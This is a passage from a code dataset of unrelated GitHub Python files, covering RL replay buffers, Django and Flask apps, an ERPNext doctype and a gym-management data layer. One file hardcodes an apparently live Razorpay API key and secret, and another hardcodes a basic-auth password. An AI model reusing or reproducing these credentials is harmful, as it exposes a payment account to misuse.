done_traj[t][1],\n 'state': state,\n 'mask': torch.tensor([mask]),\n 'hxs': {},\n 'reward': torch.tensor([reward]),\n 'next_state': next_state,\n 'next_mask': torch.tensor([next_mask]),\n 'next_hxs': {},\n })\n\n # Augment with the HER style goal.\n if self.args.her_strat == 'future':\n for k in range(self.args.her_K):\n # Randomly choose a time step in the future.\n future_t = np.random.randint(t, len(done_traj) - 1)\n future_goal = done_traj[future_t+1][0]['achieved_goal']\n\n state['desired_goal'] = future_goal\n next_state['desired_goal'] = future_goal\n 
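# Store the relabeled transition; push_trans recomputes the reward and the\n # terminal mask against the substituted goal before saving it to the buffer.\n 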
push_trans(state, next_state)\n elif self.args.her_strat == 'final':\n final_goal = done_traj[-1][0]['achieved_goal']\n state['desired_goal'] = final_goal\n next_state['desired_goal'] = final_goal\n push_trans(state, next_state)\n else:\n raise ValueError(f\"Invalid HER strategy {self.args.her_strat}\")\n","repo_name":"clvrai/goal_prox_il","sub_path":"rl-toolkit/rlf/algos/off_policy/her.py","file_name":"her.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"60"} +{"seq_id":"21341861676","text":"from django.db import models\n\n\nclass Category(models.Model):\n title = models.CharField(\n max_length=120,\n verbose_name='Название'\n )\n code = models.CharField(\n max_length=120,\n verbose_name='Код'\n )\n\n @property\n def count(self):\n return self.blog_set.count()\n\n def __str__(self):\n return self.title\n\n\nclass Blog(models.Model):\n title = models.CharField(\n max_length=120,\n verbose_name='Название'\n )\n image = models.ImageField(\n verbose_name='Картинка'\n )\n upload_date = models.DateField(\n auto_created=True\n )\n categories = models.ManyToManyField(\n Category, verbose_name=\"Категории\"\n )\n description = models.TextField(\n verbose_name='Описание'\n )\n text = models.TextField(\n verbose_name='Текст'\n )\n\n @property\n def category_list(self):\n return self.categories.all()\n\n def __str__(self):\n return self.title\n","repo_name":"moddyngway/build-course","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27405202376","text":"def arithmetic_arranger(problems, show = False):\n if len(problems) > 5:\n return \"Error: Too many problems.\"\n else:\n first_line = \"\"\n second_line = \"\"\n dash_line = \"\"\n answer_line = \"\"\n\n for i in problems:\n items = i.split()\n num_1 = items[0]\n num_2 = items[-1]\n symbol = items[1]\n\n width = max(len(num_1), len(num_2)) + 2\n\n if not num_1.isdigit() or not num_2.isdigit():\n return \"Error: Numbers must only contain digits.\"\n\n else:\n if symbol == \"+\":\n answer = int(num_1) + int(num_2)\n elif symbol == \"-\":\n answer = int(num_1) - int(num_2)\n else:\n return \"Error: Operator must be '+' or '-'.\"\n\n if len(num_1) > 4 or len(num_2) > 4:\n return \"Error: Numbers cannot be more than four digits.\"\n\n first_line += str(num_1).rjust(width)\n second_line += symbol + str(num_2).rjust(width - 1)\n dash_line += \"-\" * width\n answer_line += str(answer).rjust(width)\n\n if len(problems) >= 1:\n first_line += \" \"\n second_line += \" \"\n dash_line += \" \"\n answer_line += \" \"\n \n\n if show == True:\n arranged_problems = (first_line.rstrip() + \"\\n\" + second_line.rstrip() + \"\\n\" + dash_line.rstrip() + \"\\n\" + answer_line.rstrip())\n else:\n arranged_problems = (first_line.rstrip() + \"\\n\" + second_line.rstrip() + \"\\n\" + dash_line.rstrip())\n\n return arranged_problems","repo_name":"tcun/freeCodeCamp-Projects","sub_path":"arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15981608968","text":"from django.core.urlresolvers import reverse\nfrom django.template import Library, defaulttags\n__author__ = 'zz'\n\nregister = Library()\n\n\n@register.inclusion_tag('includes/render_next_or_previous_blog.html', 
takes_context=True)\ndef next_or_previous_blog(context, obj):\n has_previous = False\n has_next = False\n\n next_blog = obj.get_next_object()\n previous_blog = obj.get_previous_object()\n\n if next_blog:\n has_next = True\n\n if previous_blog:\n has_previous = True\n\n return {\n 'next_blog': next_blog,\n 'previous_blog': previous_blog,\n 'has_next': has_next,\n 'has_previous': has_previous\n }\n\n\n@register.simple_tag(takes_context=True)\ndef simple_url(context, obj, *args, **kwargs):\n \"\"\"\n :param obj: the url name, same as for the {% url %} tag\n :return: if there is no ':' in the viewname, the function will add the current_ns from the context.\n \"\"\"\n ns = context.get('current_ns')\n\n if ns and (':' not in obj):\n obj = ':'.join((ns, obj))\n\n return reverse(obj, args=args, kwargs=kwargs)\n\n\n@register.inclusion_tag('includes/month_links_snippet.html', takes_context=True)\ndef month_links(context):\n model = context.get('model')\n if not model:\n return None\n\n context.update({\n 'dates': model.objects.publish().datetimes('publish_date', 'month')\n\n })\n return context\n\n\n@register.inclusion_tag('includes/filter_info.html', takes_context=True)\ndef filter_info(context):\n tag = context.get('tag')\n category = context.get('category')\n year = context.get('year')\n month = context.get('month')\n\n if year:\n year = year.strftime('%Y')\n\n if month:\n month = month.strftime('%Y-%m')\n\n ret = {\n 'tag': tag,\n 'category': category,\n 'year': year,\n 'month': month\n }\n\n ret['has_filter'] = any(ret.values())\n return ret","repo_name":"littlezz/blog-project","sub_path":"core/templatetags/blog_tag.py","file_name":"blog_tag.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30925761487","text":"#!flask/bin/python\nimport os\nimport json\nimport string\nimport hashlib\nimport time\nfrom flask import Flask, jsonify, abort, make_response, request, url_for, render_template, json, g\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\nfrom random import *\n\n\napp = Flask(__name__, template_folder=\".\")\nauth = HTTPBasicAuth()\nauthToken = HTTPTokenAuth(scheme='Token')\n\n\n@auth.get_password\ndef get_password(username):\n if username == 'miguel':\n return 'python'\n return None\n\n\n@auth.error_handler\ndef unauthorized():\n return make_response(jsonify({'error': 'Unauthorized access'}), 403)\n\n\n@app.errorhandler(400)\ndef not_found(error):\n return make_response(jsonify( { 'error': 'Bad request' } ), 400)\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\ntoken_manager = [\n {\n \"str_token\": \"4231cb9ab06c4d4c3a8c7a3790bb3f98\"\n }\n]\n\nmessage = {\n \"text\": \"hi !\"\n}\n\nerreurType = {\n \"error\": \"not a valid type\"\n}\n\nbye = {\n \"text\" : \"See ya soon !\"\n}\n\n\n@app.route('/login', methods = ['POST'])\ndef get_login():\n token = hashlib.md5()\n token.update(str(time.time()))\n t = token.hexdigest()\n object = {}\n object[\"str_token\"] = t\n token_manager.append(object)\n return json.dumps(object)\n\n\n@authToken.verify_token\ndef verify_token(token):\n for t in token_manager:\n if \"str_token\" in t and t[\"str_token\"] == token:\n return True\n return False\n\n\n@app.route('/actions', methods=['POST'])\n@authToken.login_required\ndef actions():\n tab = []\n with open(\"bouton.json\", \"r\") as file:\n user_data = json.load(file)\n if request.json[\"type\"] == \"message\":\n if 
request.json[\"text\"] == \"hello\":\n data = user_data[\"boutons\"][\"bouton_menu\"]\n return json.dumps(data)\n else:\n return json.dumps(message)\n\n elif request.json[\"type\"] == \"button_tap\" and request.json[\"payload\"] :\n\n id = request.json[\"payload\"][\"button_id\"]\n for j in user_data[\"boutons\"]:\n if \"parent_id\" in user_data[\"boutons\"][j] and user_data[\"boutons\"][j][\"parent_id\"] == id:\n tab.append(user_data[\"boutons\"][j])\n if not tab:\n return json.dumps(bye)\n return json.dumps(tab)\n\n else:\n\n return json.dumps(erreurType)\n\n\n# tasks = [\n# {\n# 'id': 1,\n# 'title': u'Buy groceries',\n# 'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',\n# 'done': False\n# },\n# {\n# 'id': 2,\n# 'title': u'Learn Python',\n# 'description': u'Need to find a good Python tutorial on the web',\n# 'done': False\n# }\n# ]\n# \n# \n# def get_token():\n# min_char = 8\n# max_char = 12\n# allchar = string.ascii_letters + string.punctuation + string.digits\n# token = \"\".join(choice(allchar) for x in range(randint(min_char, max_char)))\n# tokenJson = {\"token\": token}\n# return tokenJson\n#\n#\n# def make_public_task(task):\n# new_task = {}\n# for field in task:\n# if field == 'id':\n# new_task['uri'] = url_for('get_task', task_id = task['id'], _external = True)\n# else:\n# new_task[field] = task[field]\n# return new_task\n#\n#\n# @app.route('/', methods = ['GET'])\n# def index(page_name):\n# if os.path.isfile(page_name):\n# return render_template(\"%s\" % page_name)\n# else:\n# return render_template(\"error.html\")\n#\n#\n# @app.route('/todo/api/v1.0/tasks', methods=['GET'])\n# @auth.login_required\n# def get_tasks():\n# return jsonify({'tasks': map(make_public_task, tasks)})\n#\n#\n# @app.route('/todo/api/v1.0/tasks/', methods = ['GET'])\n# @auth.login_required\n# def get_task(task_id):\n# task = filter(lambda t: t['id'] == task_id, tasks)\n# if len(task) == 0:\n# abort(404)\n# return jsonify( { 'task': make_public_task(task[0]) } )\n#\n#\n# @app.route('/todo/api/v1.0/tasks', methods = ['POST'])\n# @auth.login_required\n# def create_task():\n# if not request.json or not 'title' in request.json:\n# abort(400)\n# task = {\n# 'id': tasks[-1]['id'] + 1,\n# 'title': request.json['title'],\n# 'description': request.json.get('description', \"\"),\n# 'done': False\n# }\n# tasks.append(task)\n# return jsonify( { 'task': make_public_task(task) } ), 201\n#\n#\n# @app.route('/todo/api/v1.0/tasks/', methods = ['PUT'])\n# @auth.login_required\n# def update_task(task_id):\n# task = filter(lambda t: t['id'] == task_id, tasks)\n# if len(task) == 0:\n# abort(404)\n# if not request.json:\n# abort(400)\n# if 'title' in request.json and type(request.json['title']) != unicode:\n# abort(400)\n# if 'description' in request.json and type(request.json['description']) is not unicode:\n# abort(400)\n# if 'done' in request.json and type(request.json['done']) is not bool:\n# abort(400)\n# task[0]['title'] = request.json.get('title', task[0]['title'])\n# task[0]['description'] = request.json.get('description', task[0]['description'])\n# task[0]['done'] = request.json.get('done', task[0]['done'])\n# return jsonify( { 'task': make_public_task(task[0]) } )\n#\n#\n# @app.route('/todo/api/v1.0/tasks/', methods = ['DELETE'])\n# @auth.login_required\n# def delete_task(task_id):\n# task = filter(lambda t: t['id'] == task_id, tasks)\n# if len(task) == 0:\n# abort(404)\n# tasks.remove(task[0])\n# return jsonify({'result': True})\n\n\nif __name__ == '__main__':\n 
app.run(debug=True)","repo_name":"MaDaDevs/ChatBotPy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30570662653","text":"import os\nfrom os import path\nimport string\n\nclass FilePathManager:\n\n def __init__(self, root_path, batch_name, intermediate_saves=False, keep_unsharp=False) -> None:\n self.root_path = root_path\n self.batch_name = batch_name\n\n self.allPaths = []\n\n # general paths\n self.initDirPath = f'{self.root_path}/init_images'\n self.outDirPath = f'{self.root_path}/images_out'\n self.modelPath = f'{self.root_path}/models'\n self.batchFolder = f'{self.outDirPath}/{batch_name}'\n \n self.allPaths.append(self.initDirPath)\n self.allPaths.append(self.modelPath)\n self.allPaths.append(self.outDirPath)\n self.allPaths.append(self.batchFolder)\n\n self.partialFolder = f'{self.batchFolder}/partials'\n if intermediate_saves:\n self.allPaths.append(self.partialFolder)\n self.unsharpenFolder = f'{self.batchFolder}/unsharpened'\n if keep_unsharp:\n self.allPaths.append(self.unsharpenFolder)\n\n self.createPaths()\n\n def createPaths(self):\n for path in self.allPaths:\n self.createPath(path)\n\n def allPaths(self):\n paths = [\n self.initDirPath,\n self.outDirPath,\n self.modelPath,\n self.batchFolder\n ]\n return paths\n\n def move_files(self, batch_num, start_num, end_num, old_folder, new_folder):\n for i in range(start_num, end_num):\n old_file = old_folder + f'/{self.batch_name}({batch_num})_{i:04}.png'\n new_file = new_folder + f'/{self.batch_name}({batch_num})_{i:04}.png'\n os.rename(old_file, new_file)\n\n # Simple create paths taken with modifications from Datamosh's Batch VQGAN+CLIP notebook\n def createPath(self, filepath):\n if path.exists(filepath) == False:\n os.makedirs(filepath)\n print(f'Made {filepath}')\n else:\n print(f'filepath {filepath} exists.')\n\n# def initPaths(root_path='./output'):\n# initDirPath = f'{root_path}/init_images'\n# createPath(initDirPath)\n# outDirPath = f'{root_path}/images_out'\n# createPath(outDirPath)","repo_name":"jackylu97/disco_diffusion","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31668583469","text":"count_pen = int(input())\ncount_markers = int(input())\nliters_detergent = int(input())\nprocent_discount = int(input())\n\npen = count_pen * 5.80\nmarkers = count_markers * 7.20\ndetergent = liters_detergent * 1.20\n\nall_materials = pen + markers + detergent\ndiscount = (all_materials * procent_discount/100)\nall_price = all_materials-discount\nprint(all_price)\n","repo_name":"VladiNikolov/python_basics","sub_path":"Exercise1/supplies_for_school.py","file_name":"supplies_for_school.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"33866141307","text":"import random\nfrom dataclasses import dataclass\nfrom typing import Dict, Mapping\n\nimport numpy as np\n\nfrom entity_gym.env import (\n Action,\n ActionSpace,\n CategoricalAction,\n CategoricalActionMask,\n CategoricalActionSpace,\n Entity,\n Environment,\n Observation,\n ObsSpace,\n)\n\n\n@dataclass\nclass MoveToOrigin(Environment):\n \"\"\"\n Task with a single Spaceship that is rewarded for moving as close to the origin as possible.\n The 
Spaceship has two actions for accelerating the Spaceship in the x and y directions.\n \"\"\"\n\n x_pos: float = 0.0\n y_pos: float = 0.0\n x_velocity: float = 0.0\n y_velocity: float = 0.0\n last_x_pos = 0.0\n last_y_pos = 0.0\n step: int = 0\n\n def obs_space(cls) -> ObsSpace:\n return ObsSpace(\n entities={\n \"Spaceship\": Entity(\n [\"x_pos\", \"y_pos\", \"x_velocity\", \"y_velocity\", \"step\"]\n ),\n }\n )\n\n def action_space(cls) -> Dict[str, ActionSpace]:\n return {\n \"horizontal_thruster\": CategoricalActionSpace(\n [\n \"100% right\",\n \"10% right\",\n \"hold\",\n \"10% left\",\n \"100% left\",\n ],\n ),\n \"vertical_thruster\": CategoricalActionSpace(\n [\"100% up\", \"10% up\", \"hold\", \"10% down\", \"100% down\"],\n ),\n }\n\n def reset(self) -> Observation:\n angle = random.uniform(0, 2 * np.pi)\n self.x_pos = np.cos(angle)\n self.y_pos = np.sin(angle)\n self.last_x_pos = self.x_pos\n self.last_y_pos = self.y_pos\n self.x_velocity = 0\n self.y_velocity = 0\n self.step = 0\n return self.observe()\n\n def act(self, actions: Mapping[str, Action]) -> Observation:\n self.step += 1\n\n for action_name, a in actions.items():\n assert isinstance(a, CategoricalAction), f\"{a} is not a CategoricalAction\"\n if action_name == \"horizontal_thruster\":\n for label in a.labels:\n if label == \"100% right\":\n self.x_velocity += 0.01\n elif label == \"10% right\":\n self.x_velocity += 0.001\n elif label == \"hold\":\n pass\n elif label == \"10% left\":\n self.x_velocity -= 0.001\n elif label == \"100% left\":\n self.x_velocity -= 0.01\n else:\n raise ValueError(f\"Invalid choice id {label}\")\n elif action_name == \"vertical_thruster\":\n for label in a.labels:\n if label == \"100% up\":\n self.y_velocity += 0.01\n elif label == \"10% up\":\n self.y_velocity += 0.001\n elif label == \"hold\":\n pass\n elif label == \"10% down\":\n self.y_velocity -= 0.001\n elif label == \"100% down\":\n self.y_velocity -= 0.01\n else:\n raise ValueError(f\"Invalid choice id {label}\")\n else:\n raise ValueError(f\"Unknown action type {action_name}\")\n\n self.last_x_pos = self.x_pos\n self.last_y_pos = self.y_pos\n\n self.x_pos += self.x_velocity\n self.y_pos += self.y_velocity\n\n done = self.step >= 32\n return self.observe(done)\n\n def observe(self, done: bool = False) -> Observation:\n return Observation(\n ids={\n \"Spaceship\": [0],\n },\n features={\n \"Spaceship\": np.array(\n [\n [\n self.x_pos,\n self.y_pos,\n self.x_velocity,\n self.y_velocity,\n self.step,\n ]\n ],\n dtype=np.float32,\n ),\n },\n actions={\n \"horizontal_thruster\": CategoricalActionMask(),\n \"vertical_thruster\": CategoricalActionMask(),\n },\n reward=(self.last_x_pos**2 + self.last_y_pos**2) ** 0.5\n - (self.x_pos**2 + self.y_pos**2) ** 0.5,\n done=done,\n )\n","repo_name":"entity-neural-network/entity-gym","sub_path":"entity_gym/examples/move_to_origin.py","file_name":"move_to_origin.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"60"} +{"seq_id":"1570418257","text":"import copy\n\nimport frappe\nfrom frappe import _, qb\nfrom frappe.model.document import Document\nfrom frappe.query_builder.custom import ConstantColumn\n\nfrom erpnext.accounts.utils import _delete_pl_entries, create_payment_ledger_entry\n\nVOUCHER_TYPES = [\"Sales Invoice\", \"Purchase Invoice\", \"Payment Entry\", \"Journal Entry\"]\n\n\ndef repost_ple_for_voucher(voucher_type, voucher_no, gle_map=None):\n\tif voucher_type and voucher_no and 
gle_map:\n\t\t_delete_pl_entries(voucher_type, voucher_no)\n\t\tcreate_payment_ledger_entry(gle_map, cancel=0)\n\n\n@frappe.whitelist()\ndef start_payment_ledger_repost(docname=None):\n\t\"\"\"\n\tRepost Payment Ledger Entries for Vouchers through Background Job\n\t\"\"\"\n\tif docname:\n\t\trepost_doc = frappe.get_doc(\"Repost Payment Ledger\", docname)\n\t\tif repost_doc.docstatus.is_submitted() and repost_doc.repost_status in [\"Queued\", \"Failed\"]:\n\t\t\ttry:\n\t\t\t\tfor entry in repost_doc.repost_vouchers:\n\t\t\t\t\tdoc = frappe.get_doc(entry.voucher_type, entry.voucher_no)\n\n\t\t\t\t\tif doc.doctype in [\"Payment Entry\", \"Journal Entry\"]:\n\t\t\t\t\t\tgle_map = doc.build_gl_map()\n\t\t\t\t\telse:\n\t\t\t\t\t\tgle_map = doc.get_gl_entries()\n\n\t\t\t\t\trepost_ple_for_voucher(entry.voucher_type, entry.voucher_no, gle_map)\n\n\t\t\t\tfrappe.db.set_value(repost_doc.doctype, repost_doc.name, \"repost_error_log\", \"\")\n\t\t\t\tfrappe.db.set_value(repost_doc.doctype, repost_doc.name, \"repost_status\", \"Completed\")\n\t\t\texcept Exception as e:\n\t\t\t\tfrappe.db.rollback()\n\n\t\t\t\ttraceback = frappe.get_traceback()\n\t\t\t\tif traceback:\n\t\t\t\t\tmessage = \"Traceback: <br>
\" + traceback\n\t\t\t\t\tfrappe.db.set_value(repost_doc.doctype, repost_doc.name, \"repost_error_log\", message)\n\n\t\t\t\tfrappe.db.set_value(repost_doc.doctype, repost_doc.name, \"repost_status\", \"Failed\")\n\n\nclass RepostPaymentLedger(Document):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(RepostPaymentLedger, self).__init__(*args, **kwargs)\n\t\tself.vouchers = []\n\n\tdef before_validate(self):\n\t\tself.load_vouchers_based_on_filters()\n\t\tself.set_status()\n\n\tdef load_vouchers_based_on_filters(self):\n\t\tif not self.add_manually:\n\t\t\tself.repost_vouchers.clear()\n\t\t\tself.get_vouchers()\n\t\t\tself.extend(\"repost_vouchers\", copy.deepcopy(self.vouchers))\n\n\tdef get_vouchers(self):\n\t\tself.vouchers.clear()\n\n\t\tfilter_on_voucher_types = [self.voucher_type] if self.voucher_type else VOUCHER_TYPES\n\n\t\tfor vtype in filter_on_voucher_types:\n\t\t\tdoc = qb.DocType(vtype)\n\t\t\tdoctype_name = ConstantColumn(vtype)\n\t\t\tquery = (\n\t\t\t\tqb.from_(doc)\n\t\t\t\t.select(doctype_name.as_(\"voucher_type\"), doc.name.as_(\"voucher_no\"))\n\t\t\t\t.where(\n\t\t\t\t\t(doc.docstatus == 1)\n\t\t\t\t\t& (doc.company == self.company)\n\t\t\t\t\t& (doc.posting_date.gte(self.posting_date))\n\t\t\t\t)\n\t\t\t)\n\t\t\tentries = query.run(as_dict=True)\n\t\t\tself.vouchers.extend(entries)\n\n\tdef set_status(self):\n\t\tif self.docstatus == 0:\n\t\t\tself.repost_status = \"Queued\"\n\n\tdef on_submit(self):\n\t\texecute_repost_payment_ledger(self.name)\n\t\tfrappe.msgprint(_(\"Repost started in the background\"))\n\n\n@frappe.whitelist()\ndef execute_repost_payment_ledger(docname):\n\t\"\"\"Repost Payment Ledger Entries by background job.\"\"\"\n\n\tjob_name = \"payment_ledger_repost_\" + docname\n\n\tfrappe.enqueue(\n\t\tmethod=\"erpnext.accounts.doctype.repost_payment_ledger.repost_payment_ledger.start_payment_ledger_repost\",\n\t\tdocname=docname,\n\t\tis_async=True,\n\t\tjob_name=job_name,\n\t)\n","repo_name":"frappe/erpnext","sub_path":"erpnext/accounts/doctype/repost_payment_ledger/repost_payment_ledger.py","file_name":"repost_payment_ledger.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":15303,"dataset":"github-code","pt":"60"} +{"seq_id":"12587033337","text":"from database import db,Registration,Equipment,Member,Staff,Plans,Payment\nfrom sqlalchemy import text\nimport datetime\nfrom werkzeug.utils import secure_filename\nfrom flask import current_app\nimport razorpay\nimport os\n\nclient = razorpay.Client(auth=(\"rzp_live_OlSWv9YA7i7L6E\", \"wuXOynB8EdJN1aW80Uylihve\"))\n\nclient.set_app_details({\"title\" : \"Techpath\", \"version\" : \"0.1\"})\nUPLOAD_FOLDER = 'static/dist/img'\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}\n\n\ndef allowed_file(filename):\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\nclass data:\n def __init__(self,app):\n self.app = app \n def new_user(self,req,ref):\n user = Registration( \n Fullname = req.get('Fullname'),\n Email = req.get('Email'),\n Username = req.get('Username'),\n Password = req.get('Password'),\n Contact = req.get('Contact'),\n Gender = req.get('Gender'),\n Type = req.get('Type'),\n file = ref.get('file')\n )\n if user.file and allowed_file(user.file.filename): \n filename = secure_filename(user.file.filename)\n user.file.save(os.path.join(UPLOAD_FOLDER, filename))\n user.file=UPLOAD_FOLDER+'/'+filename\n else:\n user.file='static/dist/img/user_logo.png'\n return user\n def Member_data(self):\n query = db.session.execute(text('select Members.Member_Id,Members.Cust_Id,User.Username,User.Fullname,User.Gender,User.Contact,Plans.Plan_Name,Plans.Time_Period,Staff.Reg_Id,Staff.Fees,Members.Total_Fees,Members.Start_Date,Equipment.Name from Staff,Plans,Members,User,Equipment where Members.Cust_Id = User.User_Id and Members.Plan_Id = Plans.Plans_Id and Members.Trainer_Id = Staff.Staff_id and Members.Equipment_Id = Equipment.Equipment_Id Order by Member_Id ASC'))\n return query\n def Member_Count(self): \n with current_app.app_context():\n quer = text('select COUNT(Member_Id) from Members')\n count = db.session.execute(quer)\n return count\n def Staff_Count(self):\n with current_app.app_context():\n quer = text('select COUNT(Staff_id) from Staff')\n cnt = db.session.execute(quer)\n return cnt\n def Unpaid_Customer_Count(self): \n with current_app.app_context():\n quer = text('select COUNT(Order_Id) from Payment where Status = \"Success\"')\n count = db.session.execute(quer)\n return count\n def Equipment_Count(self):\n with current_app.app_context():\n count = db.session.execute(text('select COUNT(Equipment_Id) from Equipment'))\n return count\n def Member_all(self):\n query = db.session.query(Member).order_by(Member.Member_Id).all()\n return query\n def equipment(self,form,fil):\n kit = Equipment(\n Name = form.get('Name'),\n Quantity = form.get('Quantity'),\n Image = fil.get('Image'),\n Weight = form.get('Weight'),\n Category = form.get('Category'),\n Company = form.get('Company'),\n Equipment_Charge = form.get('Equipment_Charge')\n )\n if kit.Image and allowed_file(kit.Image.filename):\n filename = secure_filename(kit.Image.filename)\n kit.Image.save(os.path.join(UPLOAD_FOLDER, filename))\n kit.Image=UPLOAD_FOLDER+'/'+filename\n return kit\n def Equipment_Data(self):\n query = db.session.query(Equipment).order_by(Equipment.Equipment_Id).all()\n return query\n def Read_Equipment(self,Id):\n query = db.session.query(Equipment).filter_by(Equipment_Id=Id).first()\n return query\n def Equipment_with_Charge(self):\n with current_app.app_context():\n query = db.session.execute(text('select Equipment_Id,Name from Equipment where Equipment_Charge != \"0\"'))\n return query\n def Read_Member(self,id):\n query = db.session.query(Registration).filter_by(User_Id=id).first()\n return query\n def Read_Customer(self,id):\n query = db.session.query(Member).filter_by(Member_Id=id).first()\n return query\n def check_member(self):\n with current_app.app_context():\n user = db.session.execute(text('select * from User order by User_Id DESC limit 1'))\n return user\n def new_customer(self,req):\n customer = Member(\n Trainer_Id = req.get(\"Trainer_Id\"),\n Start_Date = datetime.date.today(),\n Plan_Id = req.get(\"Plan_Id\"),\n Cust_Id = req.get(\"Cust_Id\"),\n Equipment_Id = 
req.get('Equipment_Id'),\n Total_Fees = req.get('Total_Fees')\n )\n trainer_Fees = data(current_app).select_Trainer_fees(req.get(\"Trainer_Id\")).Fees\n plan_price = data(current_app).select_Plan(req.get(\"Plan_Id\")).Price\n equipment_charge = data(current_app).select_Equipment(req.get(\"Equipment_Id\")).Equipment_Charge\n customer.Total_Fees = int(trainer_Fees) + int(plan_price) + int(equipment_charge)\n return customer\n def new_employee(self,req):\n emp = Staff(\n Occupation = req.get(\"Occupation\"),\n Working_Days = req.get(\"Working_Days\"),\n Experience = req.get(\"Experience\"),\n Salary = req.get(\"Salary\"),\n Fees = req.get(\"Fees\"),\n Total = req.get(\"Total\"),\n Reg_Id = req.get(\"Reg_Id\")\n )\n emp.Total = int(emp.Salary)+int(emp.Fees)\n return emp\n def Staff_Data(self):\n query = db.session.execute(text('select User.User_Id,User.Fullname,User.Email,User.Contact,User.Gender,Staff.Occupation,Staff.Working_Days,Staff.Experience,Staff.Salary,Staff.Fees,Staff.Total,Staff.Staff_id from User,Staff where Staff.Reg_Id = User.User_Id and User.Type = \"Employee\" Order BY Staff_id ASC'))\n return query\n def trainer_data(self):\n query = db.session.query(Staff).join(Registration).add_columns(Registration.Fullname,Staff.Fees,Staff.Occupation,Staff.Experience,Registration.file).order_by(Staff.Staff_id).filter(Staff.Occupation==\"Trainer\").all()\n return query\n def Read_Staff(self,Id):\n query = db.session.query(Staff).filter_by(Staff_id=Id).first()\n return query\n def Remove_User(self,userId):\n query = db.session.execute(db.delete(Registration).filter_by(User_Id=userId)).scalar()\n return query\n def Trainer(self):\n query = db.session.query(Staff).join(Registration).add_columns(Registration.Fullname,Staff.Staff_id,Staff.Fees).filter(Staff.Reg_Id==Registration.User_Id,Staff.Occupation==\"Trainer\").all()\n return query\n def select_Trainer(self,staffId):\n query = db.session.query(Staff).join(Registration).add_columns(Registration.Fullname,Registration.Contact,Registration.Email,Registration.Gender,Staff.Reg_Id).filter_by(User_Id=staffId).first()\n return query\n def select_Trainer_fees(self,staffId):\n query = db.session.query(Staff).filter_by(Staff_id=staffId).first()\n return query\n def select_Plan(self,planId):\n query = db.session.query(Plans).filter_by(Plans_Id=planId).first()\n return query\n def select_Equipment(self,equipId):\n query = db.session.query(Equipment).filter_by(Equipment_Id=equipId).first()\n return query\n def Query_Plan(self):\n query = db.session.query(Plans).order_by(Plans.Plans_Id).all()\n return query\n def Member_Update(self,req,ref,membId,useId):\n query = data(current_app).Read_Customer(membId)\n query_registration = data(current_app).Read_Member(useId) \n query_registration.Fullname = req.get('Fullname')\n query_registration.Contact = req.get('Contact')\n query_registration.Gender = req.get('Gender')\n query_registration.Email = req.get('Email')\n query_registration.file = ref.get('file')\n if query_registration.file and allowed_file(query_registration.file.filename): \n filename = secure_filename(query_registration.file.filename) # type: ignore\n query_registration.file.save(os.path.join(UPLOAD_FOLDER, filename))\n query_registration.file=UPLOAD_FOLDER+'/'+filename\n else:\n query_registration.file='static/dist/img/user_logo.png'\n query.Trainer_Id = req.get('Trainer_Id')\n query.Plan_Id = req.get('Plan_Id')\n query.Equipment_Id = req.get('Equipment_Id')\n query.Start_Date = datetime.date.today()\n trainer_Fees = 
data(current_app).select_Trainer_fees(req.get(\"Trainer_Id\")).Fees\n plan_price = data(current_app).select_Plan(req.get(\"Plan_Id\")).Price\n equipment_charge = data(current_app).select_Equipment(req.get(\"Equipment_Id\")).Equipment_Charge\n query.Total_Fees = int(trainer_Fees) + int(plan_price) + int(equipment_charge)\n return query_registration.Fullname,query_registration.Gender,query_registration.file,query_registration.Email,query_registration.Contact,query.Trainer_Id,query.Plan_Id,query.Equipment_Id,query.Total_Fees\n def Staff_Update(self,req,ref,staffId,userId):\n staff_query = data(current_app).Read_Staff(staffId)\n member_query = data(current_app).Read_Member(userId)\n member_query.Fullname = req.get('Fullname')\n member_query.Contact = req.get('Contact')\n member_query.Email = req.get('Email')\n member_query.file = ref.get('file')\n if member_query.file and allowed_file(member_query.file.filename): \n filename = secure_filename(member_query.file.filename)\n member_query.file.save(os.path.join(UPLOAD_FOLDER, filename))\n member_query.file=UPLOAD_FOLDER+'/'+filename\n else:\n member_query.file='static/dist/img/user_logo.png'\n staff_query.Experience = req.get('Experience')\n staff_query.Working_Days = req.get('Working_Days')\n staff_query.Fees = req.get('Fees')\n staff_query.Salary = req.get('Salary')\n staff_query.Total = int(staff_query.Fees) + int(staff_query.Salary)\n return member_query.Fullname,member_query.Contact,member_query.file,member_query.Email,staff_query.Experience,staff_query.Working_Days,staff_query.Total\n def Equipment_Update(self,req,ref,equipment_Id):\n equipment_query = data(current_app).select_Equipment(equipment_Id)\n equipment_query.Name = req.get('Name')\n equipment_query.Quantity = req.get('Quantity')\n equipment_query.Weight = req.get('Weight')\n equipment_query.Category = req.get('Category')\n equipment_query.Company = req.get('Company')\n equipment_query.Equipment_Charge = req.get('Equipment_Charge')\n equipment_query.Image = 